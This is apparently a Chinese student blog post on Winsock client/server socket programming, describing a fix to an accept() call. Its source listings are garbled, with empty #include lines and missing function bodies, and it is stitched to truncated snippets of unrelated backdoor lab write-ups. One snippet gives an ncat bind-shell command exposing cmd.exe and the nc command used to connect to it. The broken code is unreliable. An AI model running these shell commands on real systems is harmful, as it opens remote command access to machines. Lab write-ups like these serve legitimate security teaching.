1.工程檔案需鏈結套接字動態鏈結庫,我用的是ws2_32.dll;也可以靜態鏈結,但應該增加了編譯代價。
2.源**
【server】
[general_main.cpp]
#include
#include
void main(void)
【client】
[general_main.cpp]
#include
#include
//#pragma comment(lib,"ws2_32.lib") //import static linked lib
void client_action1(wsadata* wsad, socket* s, sockaddr_in* saddr, int port);
void client_action2(wsadata* wsad, socket* s, sockaddr_in* saddr, int port);
void main(void)
[client_exp1.cpp]
#include
#include
void client_action1(wsadata* wsad, socket* s, sockaddr_in* saddr, int port)
;3.發現問題,雖然連線成功而且也成功傳送和接收了資料,但server中列印client的資訊始終如圖
且其中52428好像是某個數字超限後的固定輸出。客戶端的位址看起來也不正確。
4.上面的問題已解決,在server程式中,使用accept函式時,第三個引數用來給客戶端位址資訊結構體預留空間,我把它設定為了null,所以這一塊是空的。
newconnection = accept(listeningsock, (sockaddr *)&clientaddr, null);
改為int n = sizeof(clientaddr);
newconnection = accept(listeningsock, (sockaddr *)&clientaddr, &n);
Exp2 後門原理與實踐
1.在win10的cmd裡,進入d ncat ncat,輸入ncat l e cmd.exe p 53 2.在kali的終端裡,輸入nc 172.16.2.29 53連線win10,獲得shell許可權 1.在win10靶機中點選控制面板 系統和安全 管理工具 任務計畫程式,話不多說,上圖。在操作選...
20155207王雪純 Exp2 後門原理與實踐
windows 使用 ipconfig 命令檢視當前機器ip位址。進入ncat所在檔案位址,使用ncat命令開啟監聽 linux 連線win 在linux終端輸入命令ifconfig檢視虛擬機器linux的ip號。然後輸入命令nc l p 5207讓虛擬機器開始監聽指定埠5207 在windows命...
20145304 劉欽令 Exp2 後門原理與實踐
1 例舉你能想到的乙個後門進入到你系統中的可能方式?2 例舉你知道的後門如何啟動起來 win及linux 的方式?3 meterpreter有哪些給你映像深刻的功能?4 如何發現自己有系統有沒有被安裝後門?這次實驗,讓我真正體驗到了之前聽說的一些入侵攻擊方法,因為攻擊者和被攻擊者都是自己,所以實驗過...